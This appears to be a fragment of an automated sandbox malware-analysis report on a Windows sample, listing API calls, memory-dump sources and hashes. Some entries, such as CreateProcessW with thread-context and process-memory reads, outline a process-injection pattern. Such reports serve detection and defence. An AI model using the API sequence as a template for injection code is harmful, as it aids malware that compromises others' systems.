                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                            • String ID:
                                                            • API String ID: 1438897964-0
                                                            • Opcode ID: 13bbe0c74f5194e49c071aa5a0b14ab81aac5f2f5d26dabd82ae82306b4d1084
                                                            • Instruction ID: 9525eea27cfe2a06ee6bb0b94f8a439f0fec78f72a1223afaaa4f4cc7b3f6ca0
                                                            • Opcode Fuzzy Hash: 13bbe0c74f5194e49c071aa5a0b14ab81aac5f2f5d26dabd82ae82306b4d1084
                                                            • Instruction Fuzzy Hash: 96118E729143019BC700EF69E80591EBBE8EB95754F10893FF440932B2DB749A49CB9E
                                                            APIs
                                                            • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00405821,?,?,?,?), ref: 00405CC7
                                                            • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00405821,?,?,?,?), ref: 0043DD73
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: aed05ab6a1b88559d57bbe8f1293197c90d85f92c05dbd21c07c0e87b90c3386
                                                            • Instruction ID: 3e9ad2372c7cfb2b297ed5c82f770502f6fc7a31e1f40b0728b8e52e39df89fe
                                                            • Opcode Fuzzy Hash: aed05ab6a1b88559d57bbe8f1293197c90d85f92c05dbd21c07c0e87b90c3386
                                                            • Instruction Fuzzy Hash: 9A018870144708BEF7201E24CC8AF673ADCEB05768F10832AFAD56A1D0C6B81C458F58
                                                            APIs
                                                            • CreateThread.KERNEL32(00000000,00000000,00B555C0,?,00000000,00000000), ref: 00B55A51
                                                            • RtlExitUserThread.NTDLL(00000000), ref: 00B55B11
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Thread$CreateExitUser
                                                            • String ID:
                                                            • API String ID: 4108186749-0
                                                            • Opcode ID: 20dda52f05343662fa1ab2d783af82cbf7808d03b094aeec6b6820099703b69b
                                                            • Instruction ID: f0e1c26af733ff10ff81583288d77958f733c179b89b3347d091151ce137cebc
                                                            • Opcode Fuzzy Hash: 20dda52f05343662fa1ab2d783af82cbf7808d03b094aeec6b6820099703b69b
                                                            • Instruction Fuzzy Hash: 8C11181550DBC14ED7338B68883936AAFE09F63727F5D06DAD9D08A0E3C299094C83A3
                                                            APIs
                                                              • Part of subcall function 0042571C: __FF_MSGBANNER.LIBCMT ref: 00425733
                                                              • Part of subcall function 0042571C: __NMSG_WRITE.LIBCMT ref: 0042573A
                                                              • Part of subcall function 0042571C: RtlAllocateHeap.NTDLL(00D40000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                                                            • std::exception::exception.LIBCMT ref: 00420DEC
                                                            • __CxxThrowException@8.LIBCMT ref: 00420E01
                                                              • Part of subcall function 0042859B: RaiseException.KERNEL32(?,?,00000000,004B9E78,?,00000001,?,?,?,00420E06,00000000,004B9E78,00409E8C,00000001), ref: 004285F0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                            • String ID:
                                                            • API String ID: 3902256705-0
                                                            • Opcode ID: f9d52615186fd6d384fb15de7d7a4816dfb19e9dc7db00e42ce54749fafe4e8e
                                                            • Instruction ID: 7ce0db18d3e86308d2e94e4ef4c1f65fcbea9f9514d772724804ad69f7891851
                                                            • Opcode Fuzzy Hash: f9d52615186fd6d384fb15de7d7a4816dfb19e9dc7db00e42ce54749fafe4e8e
                                                            • Instruction Fuzzy Hash: BAF0863560223976CB10BA95FD015DF7BE89F01315F90452FF90496282DFB89A8091DD
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: __lock_file_memset
                                                            • String ID:
                                                            • API String ID: 26237723-0
                                                            • Opcode ID: ba8f5e451a8ec4a75135d94e347059916301475a1d87ff8d947c1e1db94b3a7d
                                                            • Instruction ID: eb59cd814e1449f2521413b7bdb600bd306f3e119aeaedc73612e9d55c5f6ff2
                                                            • Opcode Fuzzy Hash: ba8f5e451a8ec4a75135d94e347059916301475a1d87ff8d947c1e1db94b3a7d
                                                            • Instruction Fuzzy Hash: B901D871A01624ABCF21AF66BC0259F7B61AF50325FD0411FB81817251DB398551DF59
                                                            APIs
                                                              • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                                            • __lock_file.LIBCMT ref: 004253EB
                                                              • Part of subcall function 00426C11: __lock.LIBCMT ref: 00426C34
                                                            • __fclose_nolock.LIBCMT ref: 004253F6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                            • String ID:
                                                            • API String ID: 2800547568-0
                                                            • Opcode ID: 835793fb4b5a24fbea1eeed30733b59c67049ef9a82bceb899d9520eea3a16f0
                                                            • Instruction ID: fafcd99f2ade88ab86af259f2ce8aa17897398df1327fb2dd29172a4384519b5
                                                            • Opcode Fuzzy Hash: 835793fb4b5a24fbea1eeed30733b59c67049ef9a82bceb899d9520eea3a16f0
                                                            • Instruction Fuzzy Hash: 56F09C71B026249AD710BF66780579D66E06F41378FA1914FE814E71C1CFBC49419B5E
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,0040542F,?,?,?,?,?), ref: 0040807A
                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,0040542F,?,?,?,?,?), ref: 004080AD
                                                              • Part of subcall function 0040774D: _memmove.LIBCMT ref: 00407789
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$_memmove
                                                            • String ID:
                                                            • API String ID: 3033907384-0
                                                            • Opcode ID: 51f37850cb98198eeba0813d0ef72a7708f98348aba4f21530bc2901e167cef6
                                                            • Instruction ID: be71039b59a243880f73e1074d907fcebe79c3230fd69eb509900504ef28c21c
                                                            • Opcode Fuzzy Hash: 51f37850cb98198eeba0813d0ef72a7708f98348aba4f21530bc2901e167cef6
                                                            • Instruction Fuzzy Hash: C9018F31201114BEEB246B22DD4AF7B3B6DEF85360F10803EF905DE2D1DE34A8009679
                                                            APIs
                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00B55D6D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: FreeVirtual
                                                            • String ID:
                                                            • API String ID: 1263568516-0
                                                            • Opcode ID: 5aec6409a5d07a72ddf431abffa6da34671ff16b1672739225386697b636eac0
                                                            • Instruction ID: bc9fbdf9f479fc917398f09daff9dec5b6dec0abbdaa4f047ee840efc4b89ff9
                                                            • Opcode Fuzzy Hash: 5aec6409a5d07a72ddf431abffa6da34671ff16b1672739225386697b636eac0
                                                            • Instruction Fuzzy Hash: FBF03663904F10A6DE3E1368997EF712AF0D712717F4D41F6AE41590F28A565C0EC542
                                                            APIs
                                                            • CreateProcessW.KERNEL32(?,00000000), ref: 00DD8403
                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00DD8499
                                                            • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00DD84BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2247837317.0000000000DD6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00DD6000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dd6000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                            • String ID:
                                                            • API String ID: 2438371351-0
                                                            • Opcode ID: 282d440d23347d33a5333bc70feb3b77e7ffa06fe9f8fdc76eda24defaf3804a
                                                            • Instruction ID: 2b66a92efd106b3f9accaef7095550ae88c4a71c77be0c1e644ec490acfb2ad1
                                                            • Opcode Fuzzy Hash: 282d440d23347d33a5333bc70feb3b77e7ffa06fe9f8fdc76eda24defaf3804a
                                                            • Instruction Fuzzy Hash: E412CF24E24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A5E77A4F85CF5A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 67a2ba8d3432468b4af51353f2bc2a70b03686cec8e695b932a0f1a637f474b1
                                                            • Instruction ID: 59746a506085f9a8c767ac7a9c60eb165ae32953a07f1a256ff4f0a5640944f7
                                                            • Opcode Fuzzy Hash: 67a2ba8d3432468b4af51353f2bc2a70b03686cec8e695b932a0f1a637f474b1
                                                            • Instruction Fuzzy Hash: C871E43180DF808EC736462888B5775BBF0EB66323F8D46DADC958B1E2D2719D4D8792
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 98c29cfb24ce68e9de0a3e4653d5cdaeed7e1c02807bea28096c5e890268b1a6
                                                            • Instruction ID: 2d49773f75dd6c9e76722b9e08c524f4cf74b12b855309a226cff4a1f54d4b31
                                                            • Opcode Fuzzy Hash: 98c29cfb24ce68e9de0a3e4653d5cdaeed7e1c02807bea28096c5e890268b1a6
                                                            • Instruction Fuzzy Hash: 7D619B706002069FDB20DF60C881AABB7E5EF44314F14847EED06A7782D779ED59CB59
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 655149723a526a119eba7f333844dbfa5ebcbda2c28a3769f0cc5d9cc4bc4e9a
                                                            • Instruction ID: 6b63161941b3488df7078e909ce163a2a1fa0d71039c57995929c397e8c210d0
                                                            • Opcode Fuzzy Hash: 655149723a526a119eba7f333844dbfa5ebcbda2c28a3769f0cc5d9cc4bc4e9a
                                                            • Instruction Fuzzy Hash: 4C51D234700604AFDF14EF65C981EAE77A6AF45318F15816EF906AB382DA38ED01CB49
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: 9b66ca3a1bf3ca386ab96623059038914a149c0a3e5575ad7caa120d5a025636
                                                            • Instruction ID: 703fb4e51e7414ef2a0eeb7bc43b43b7e3b383bd1c29d48b3ed1298fc8db5a6e
                                                            • Opcode Fuzzy Hash: 9b66ca3a1bf3ca386ab96623059038914a149c0a3e5575ad7caa120d5a025636
                                                            • Instruction Fuzzy Hash: FD319279A08612AFC714DF19D490A62F7E0FF09310B54C57EE98A9B791D734E841CB8A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7f2dc08c644dc6ca05cc6c2326d728d4a46702471d9b997669307385dad58c7a
                                                            • Instruction ID: 3f99a29264c13c6edec6b7e36e59b75667cb61dc56e1963e755915435a82c8d0
                                                            • Opcode Fuzzy Hash: 7f2dc08c644dc6ca05cc6c2326d728d4a46702471d9b997669307385dad58c7a
                                                            • Instruction Fuzzy Hash: 0731AA6190C7409ACB358B28C498739BBF0EBA1753FCC86DADD859B2E2D6758C0CD752
                                                            APIs
                                                            • SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00405B96
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: FilePointer
                                                            • String ID:
                                                            • API String ID: 973152223-0
                                                            • Opcode ID: 0a56fba6add9114e978367d08c36dc312f4c33068dc276e25079fb3dbbe776f4
                                                            • Instruction ID: 1b656b166a304b9d337e3dd4d9fe6df5e0790be29ec59920d2bb6ad29cb972c8
                                                            • Opcode Fuzzy Hash: 0a56fba6add9114e978367d08c36dc312f4c33068dc276e25079fb3dbbe776f4
                                                            • Instruction Fuzzy Hash: F0315C31A00A09AFDB18DF6DC480A6EB7B5FF48310F14866AD815A3754D774B990CF95
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID:
                                                            • API String ID: 544645111-0
                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                            • Instruction ID: 57d61025d726f571206bde1542701663147cad70cf876be0f0a1b4f50b8a7032
                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                            • Instruction Fuzzy Hash: 9031E7B0B001159BC71CDF0AE484A6AF7E5FB49300BA48696E40ACB356D635EDC1DB89
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: ClearVariant
                                                            • String ID:
                                                            • API String ID: 1473721057-0
                                                            • Opcode ID: d182fd2a8941a7cd94101b3a2aa97755fded6afb6422dcc5fd8f0978a5f28f82
                                                            • Instruction ID: 88ec2210b97eaeb66bd16e67604d6e353b3070822350be419431805434595ad1
                                                            • Opcode Fuzzy Hash: d182fd2a8941a7cd94101b3a2aa97755fded6afb6422dcc5fd8f0978a5f28f82
                                                            • Instruction Fuzzy Hash: 24414C746083419FDB14DF14C444B1ABBE1BF45318F0988ADE8999B362C739EC45CF4A
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: f3a8ba66783d9f2ca771444c789aedbf2dca50b5bbb514ea790e640098e8d90e
                                                            • Instruction ID: 5aee7fa9bcd607eba38c972a5a3afb297840d704fa760c95cbb8f93a96c2956d
                                                            • Opcode Fuzzy Hash: f3a8ba66783d9f2ca771444c789aedbf2dca50b5bbb514ea790e640098e8d90e
                                                            • Instruction Fuzzy Hash: 2821D471910A08EBCB009F52F84076A7BB8FB09310F21957BE485D5151DB7494D0D74E
                                                            APIs
                                                              • Part of subcall function 00404BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00404BEF
                                                              • Part of subcall function 0042525B: __wfsopen.LIBCMT ref: 00425266
                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E0F
                                                              • Part of subcall function 00404B6A: FreeLibrary.KERNEL32(00000000), ref: 00404BA4
                                                              • Part of subcall function 00404C70: _memmove.LIBCMT ref: 00404CBA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Library$Free$Load__wfsopen_memmove
                                                            • String ID:
                                                            • API String ID: 1396898556-0
                                                            • Opcode ID: 38ec5427debe44dbaf010247b0005924d02b12c3bdd9824270641944ab0405bf
                                                            • Instruction ID: 9236aa628d2d192556c2689c07174e5c913df1e85eea92ba98d954e2704214a9
                                                            • Opcode Fuzzy Hash: 38ec5427debe44dbaf010247b0005924d02b12c3bdd9824270641944ab0405bf
                                                            • Instruction Fuzzy Hash: 8511C471600205ABCF14BF71C812FAE77A8AFC4718F10883FF641B71C1DA79AA059B99
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
